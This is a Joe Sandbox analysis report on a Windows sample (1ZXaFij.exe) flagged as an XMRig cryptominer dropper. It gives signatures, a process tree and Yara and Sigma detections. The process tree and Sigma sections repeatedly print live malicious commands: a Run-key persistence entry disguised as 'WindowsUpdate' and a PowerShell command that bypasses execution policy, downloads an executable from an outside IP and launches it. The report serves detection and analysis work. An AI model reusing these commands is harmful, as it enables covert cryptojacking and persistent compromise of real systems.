Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1ZXaFij.exe

Overview

General Information

Sample name:1ZXaFij.exe
Analysis ID:1627183
MD5:fe93a52fe64767a5ea5d347ade107dee
SHA1:8a642f7dfdc97360b25b4be5129a44b55e453b59
SHA256:66cc7ecb9b97788b176b5f8105e47368e8c226b8d9d9bf2496f4b30999da8530
Tags:CoinMinerexeuser-aachum
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
Bypasses PowerShell execution policy
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops PE files to the startup folder
Found API chain indicative of sandbox detection
Injects code into the Windows Explorer (explorer.exe)
Joe Sandbox ML detected suspicious sample
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect sandboxes (foreground window change detection)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 1ZXaFij.exe (PID: 2848 cmdline: "C:\Users\user\Desktop\1ZXaFij.exe" MD5: FE93A52FE64767A5EA5D347ADE107DEE)
    • cmd.exe (PID: 1652 cmdline: C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7256 cmdline: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 7696 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 7728 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9CAF.tmp" "c:\Users\user\AppData\Local\Temp\5trl00oq\CSC8D43AD1B76AB4ACB9D31FAE12D51980.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • powershell.exe (PID: 7880 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8088 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 6912 cmdline: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • runps.exe (PID: 7348 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" MD5: FE93A52FE64767A5EA5D347ADE107DEE)
    • cmd.exe (PID: 7364 cmdline: C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7460 cmdline: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 7712 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vk4yczyv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 7744 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D6A.tmp" "c:\Users\user\AppData\Local\Temp\CSC95BE416761534B22A9BF915F54099EA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • reg.exe (PID: 7372 cmdline: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • explorer.exe (PID: 7188 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • WerFault.exe (PID: 5700 cmdline: C:\Windows\system32\WerFault.exe -u -p 7188 -s 7020 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7420 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • explorer.exe (PID: 6148 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • WerFault.exe (PID: 2168 cmdline: C:\Windows\system32\WerFault.exe -u -p 6148 -s 8632 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • explorer.exe (PID: 2500 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • WerFault.exe (PID: 3648 cmdline: C:\Windows\system32\WerFault.exe -u -p 2500 -s 7024 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • explorer.exe (PID: 4960 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    dump.pcapMacOS_Cryptominer_Xmrig_241780a1unknownunknown
    • 0x1080e7e:$a1: mining.set_target
    • 0x179e27b:$a1: mining.set_target
    • 0x107af1e:$a2: XMRIG_HOSTNAME
    • 0x1798439:$a2: XMRIG_HOSTNAME
    • 0x107d360:$a3: Usage: xmrig [OPTIONS]
    • 0x179a83b:$a3: Usage: xmrig [OPTIONS]
    • 0x107aef6:$a4: XMRIG_VERSION
    • 0x1798411:$a4: XMRIG_VERSION

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000017.00000002.1681510844.0000000010AE0000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x6b2d10:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
    00000017.00000002.1682248849.00000000111A0000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x6b2d10:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
    00000017.00000000.1514869654.00000000111A0000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x6b2d10:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
    00000017.00000000.1543470099.000000C000C00000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000017.00000000.1543470099.000000C000C00000.00000004.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x468470:$a1: mining.set_target
      • 0x462e58:$a2: XMRIG_HOSTNAME
      • 0x464f40:$a3: Usage: xmrig [OPTIONS]
      • 0x462e30:$a4: XMRIG_VERSION
      Click to see the 1 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      23.0.explorer.exe.c000ae0000.14.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        23.0.explorer.exe.c000ae0000.14.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x586c70:$a1: mining.set_target
        • 0x581658:$a2: XMRIG_HOSTNAME
        • 0x583740:$a3: Usage: xmrig [OPTIONS]
        • 0x581630:$a4: XMRIG_VERSION
        23.0.explorer.exe.c000ae0000.14.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
        • 0x58dce1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
        23.0.explorer.exe.c000ae0000.14.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
        • 0x58e1b0:$s1: %s/%s (Windows NT %lu.%lu
        • 0x58f230:$s3: \\.\WinRing0_
        • 0x585938:$s4: pool_wallet
        • 0x580ea8:$s5: cryptonight
        • 0x580eb8:$s5: cryptonight
        • 0x580ec8:$s5: cryptonight
        • 0x580ed8:$s5: cryptonight
        • 0x580ef0:$s5: cryptonight
        • 0x580f00:$s5: cryptonight
        • 0x580f10:$s5: cryptonight
        • 0x580f28:$s5: cryptonight
        • 0x580f38:$s5: cryptonight
        • 0x580f50:$s5: cryptonight
        • 0x580f68:$s5: cryptonight
        • 0x580f78:$s5: cryptonight
        • 0x580f88:$s5: cryptonight
        • 0x580f98:$s5: cryptonight
        • 0x580fb0:$s5: cryptonight
        • 0x580fc8:$s5: cryptonight
        • 0x580fd8:$s5: cryptonight
        • 0x580fe8:$s5: cryptonight

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Suspicious Invoke-WebRequest Execution
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4056, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami, ProcessId: 7880, ProcessName: powershell.exe
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1652, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", ProcessId: 7256, ProcessName: powershell.exe
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 6912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
        Sigma detected: Direct Autorun Keys Modification
        Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\1ZXaFij.exe", ParentImage: C:\Users\user\Desktop\1ZXaFij.exe, ParentProcessId: 2848, ParentProcessName: 1ZXaFij.exe, ProcessCommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, ProcessId: 6912, ProcessName: reg.exe
        Sigma detected: Dynamic .NET Compilation Via Csc.EXE
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7256, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline", ProcessId: 7696, ProcessName: csc.exe
        Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\1ZXaFij.exe", ParentImage: C:\Users\user\Desktop\1ZXaFij.exe, ParentProcessId: 2848, ParentProcessName: 1ZXaFij.exe, ProcessCommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, ProcessId: 6912, ProcessName: reg.exe
        Sigma detected: PowerShell Web Download
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\1ZXaFij.exe", ParentImage: C:\Users\user\Desktop\1ZXaFij.exe, ParentProcessId: 2848, ParentProcessName: 1ZXaFij.exe, ProcessCommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, ProcessId: 6912, ProcessName: reg.exe
        Sigma detected: Startup Folder File Write
        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\1ZXaFij.exe, ProcessId: 2848, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe
        Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4056, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami, ProcessId: 7880, ProcessName: powershell.exe
        Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\1ZXaFij.exe", ParentImage: C:\Users\user\Desktop\1ZXaFij.exe, ParentProcessId: 2848, ParentProcessName: 1ZXaFij.exe, ProcessCommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, ProcessId: 6912, ProcessName: reg.exe
        Sigma detected: Suspicious Powershell In Registry Run Keys
        Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 6912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
